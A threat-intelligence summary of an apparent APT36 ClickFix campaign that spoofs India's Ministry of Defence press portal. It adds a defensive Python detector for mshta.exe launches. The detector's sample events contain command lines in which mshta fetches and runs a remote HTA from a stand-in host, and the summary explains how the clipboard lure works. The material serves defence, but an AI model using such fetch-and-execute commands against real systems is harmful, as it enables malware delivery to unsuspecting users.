Threat actors used branding spoofing to deliver cross-platform malware targeting Indian government infrastructure. They mimicked official press releases and employed ClickFix techniques to execute malicious commands silently. (Affected: Indian government, security, victims of malware)
Key points:
- Threat actors are resorting to recognizable government branding to disguise malware execution.
- A fake website imitating India’s Ministry of Defence was found serving cross-platform malware.
- Cloned content included press release archives with mostly inactive links.
- The malware delivery used ClickFix-style social engineering techniques.
- Windows and Linux systems were targeted differently, each via commands placed on the clipboard.
- Indicators confirmed involvement of APT36 through unique methods and HTML techniques.
- The campaign reflects a lack of advanced techniques but shows clear intent and strategic planning.
MITRE Techniques:
- **T1566 – Phishing**: Spoofed government press release portal used to lure victims into executing commands.
- **T1059.001 – JavaScript**: JavaScript used on Windows to silently copy the malicious command to the clipboard for execution.
- **T1071.001 – Application Layer Protocol: Web Protocols**: Used HTTP for communication with malicious infrastructure.
- **T1218.001 – Signed Binary Proxy Execution**: Exploited mshta.exe for executing the payload on Windows systems.
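As an added example (not code from the hunt.io report or its authors), a Python check a defender could run over Windows process-creation events to surface the mshta.exe launch pattern described above; the event records, parent processes and hostname are constructed for illustration.

```python
import re
from typing import Optional

# Constructed sample process-creation events (Sysmon Event ID 1 style, cut
# down to three fields). Command lines, parents and the hostname are
# assumptions for illustration, not values from the hunt.io report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://malicious.example/sysinte.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta "C:\Program Files\Vendor\setup.hta"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta.exe https://malicious.example/sysinte.hta"},
]

# Script handed to mshta over the network: an http(s) URL or a UNC path.
REMOTE_ARG = re.compile(r"(https?://|\\\\)[^\s\"']+", re.IGNORECASE)
# Parents a Run-dialog or terminal paste (the ClickFix route) launches from.
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "powershell.exe")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: dict) -> Optional[str]:
    """'remote-hta' when mshta.exe fetches its script over the network
    (the proxy-execution pattern above); 'local-hta' when it is run
    interactively with a local file, a lower-confidence lead; else None."""
    if basename(event["Image"]) != "mshta.exe":
        return None
    if REMOTE_ARG.search(event["CommandLine"]):
        return "remote-hta"
    if basename(event["ParentImage"]) in INTERACTIVE_PARENTS:
        return "local-hta"
    return None


def scan(events: list) -> list:
    """Return (index, label, command line) for every flagged event."""
    return [(i, label, ev["CommandLine"]) for i, ev in enumerate(events)
            if (label := classify_event(ev))]
```

Feeding real Sysmon or EDR process-creation records through `scan` and reviewing every `remote-hta` hit is the practical use; `local-hta` hits need context before acting.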
Indicators of Compromise:
- The article mentions two IP addresses, 192.64.118[.]76 and 185.117.90[.]212, linked to malicious infrastructure.
- Domains such as email.gov.in.drdosurvey[.]info and email.gov.in.avtzyu[.]store are identified as part of the attack infrastructure.
- The HTA file named sysinte.hta associated with the Windows delivery technique has a specific SHA-256 hash.
- URLs imitating legitimate government sites were observed and signal likely phishing activity.

Full Story: https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence